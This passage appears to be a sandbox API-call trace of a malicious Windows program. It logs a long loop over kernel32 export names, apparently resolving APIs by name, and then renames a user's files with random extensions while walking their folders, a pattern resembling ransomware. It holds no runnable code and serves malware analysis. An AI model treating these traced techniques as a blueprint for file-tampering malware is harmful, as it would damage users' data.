returned="CreateFileMappingNumaW" [0185.787] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.787] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.787] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.787] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.787] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.787] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.787] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.787] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.787] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.787] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.788] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.788] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.788] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.788] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.788] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.788] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.788] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.788] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.788] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.788] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.788] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.788] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.788] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.788] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.788] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.788] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.788] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.788] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.788] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.789] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.789] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.789] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.789] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.789] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.789] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.789] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.789] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.789] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.789] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.789] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.789] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.790] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.790] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.790] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.790] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.790] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.790] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.790] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.790] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.790] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.790] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.790] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.790] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.790] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.790] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.790] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.790] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.790] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.790] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.790] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.790] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.791] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.791] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.791] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.791] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.791] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.791] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.791] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.791] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.791] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.791] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.791] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.791] lstrlenA (lpString="DELETEATOM") returned 10 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.791] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.791] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.791] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.791] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.791] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.791] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.791] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.791] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.791] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.792] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.792] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.792] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.792] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.792] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.792] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.792] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.792] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.792] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.792] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.792] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.792] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.792] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.792] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.792] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.792] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.792] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.792] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.792] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.792] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.793] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.793] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.793] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.793] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.793] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.793] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.793] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.793] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.793] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.793] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.793] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.793] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.793] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.793] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.793] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ") returned 84 [0185.793] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ.aXFyI5") returned 91 [0185.794] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.yxqcbrq"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ.aXFyI5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.yxqcbrq.axfyi5"), dwFlags=0x0) returned 1 [0185.794] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.794] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.795] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.795] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaefc60a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url.yxQcBrQ", cAlternateFileName="WINDOW~2.YXQ")) returned 0 [0185.795] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.795] CloseHandle (hObject=0x25c) returned 1 [0185.795] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaefc60a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefc60a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live\\", cAlternateFileName="WINDOW~1")) returned 0 [0185.795] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0185.795] CloseHandle (hObject=0x254) returned 1 [0185.795] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0185.795] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0185.795] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0185.795] lstrcatW (in: lpString1="Links", lpString2="\\" | out: lpString1="Links\\") returned="Links\\" [0185.795] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS 